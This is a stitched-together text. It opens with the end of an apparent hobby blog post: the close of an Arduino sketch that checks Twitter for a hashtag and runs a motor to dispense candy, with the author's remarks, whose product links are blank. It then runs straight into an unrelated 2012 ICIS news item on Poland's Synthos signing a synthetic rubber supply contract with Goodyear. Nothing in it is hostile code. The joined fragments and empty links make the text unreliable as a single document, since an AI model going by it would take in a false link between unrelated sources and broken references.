              oldTweet[i] = tweet[i];
            break;
          }
        }
      }
    }
    delay(1);
    client.stop();
  }
  Serial.println("delay...");
  delay(60000); // don't make this less than 30000 (30 secs), because you can't connect to the twitter servers faster (you'll be banned)
  // of course it would be better to use "Blink without delay", but I leave that to you.
}

void feedKids() {
  Serial.println("Time to feed the kids!");
  digitalWrite(treatPin, HIGH);
  delay(2000); // time in ms to run the motor
  digitalWrite(treatPin, LOW);
}
The code searches for the hashtag #candy4greg and then compares it with the previous time it checked, if there is a difference I get fed :)
The below images and above code should point you in the right direction.
An endnote: The actual candy machine is from Maplin; here is a link to the product page:. They have a larger model, and I want that one now that I know the idea works. That is at. Both are on sale at the moment, so grab them before they become popular now that us arduino lovers have discovered them!
A note for parents: Candy like chewing gum balls are not an acceptable substitute for square meals. Stick to giving the kids drumstick lollies and mojo’s and you’ll be fine.
24 August 2012 13:11 [Source: ICIS news]
(recasts, clarifying company descriptor in third paragraph)
LONDON (ICIS)--Poland's Synthos has signed a six-year contract to supply synthetic rubber to tyre maker Goodyear, the Polish producer said on Friday.
The value of the deal with Goodyear, which runs to the end of 2018, is estimated at zlotych (Zl) 3.74bn ($1.15bn, €912m), the company added.
Synthos is Europe's second largest SBR and BR producer.
The price-setting mechanism for rubber covered by the contract is based on feedstock prices, the company said.
“Although the new contract does not necessarily affect our sales volume forecasts, we perceive the news as positive from the perspective of volume visibility for the next few years,” said Piotr Drozd, an analyst at Prague-based investment bank WOOD & Company, in a note to investors.
“Assuming that the first contract volumes are delivered in the third quarter of this year, the estimated contract value implies approximately Zl 0.6bn in sales per annum. Against our ESBR price forecast of €2,300/tonne, this translates into around 60,000 tonnes of ESBR/SSBR annually, or 23% of our 2013-15 forecasts and 18% of our 2017-18 volume estimates [for the company],” he added.
Synthos is currently constructing a 100,000 tonne/year S-SBR and polybutadiene rubber (PBR) facility in Krakow, southern Poland.
“We expect the first batches from the new unit to arrive in 2015 and the unit to operate with 90% capacity utilisation starting from 2017,” said Drozd.
($1 = Zl 3.26, €1 = Zl 4.10)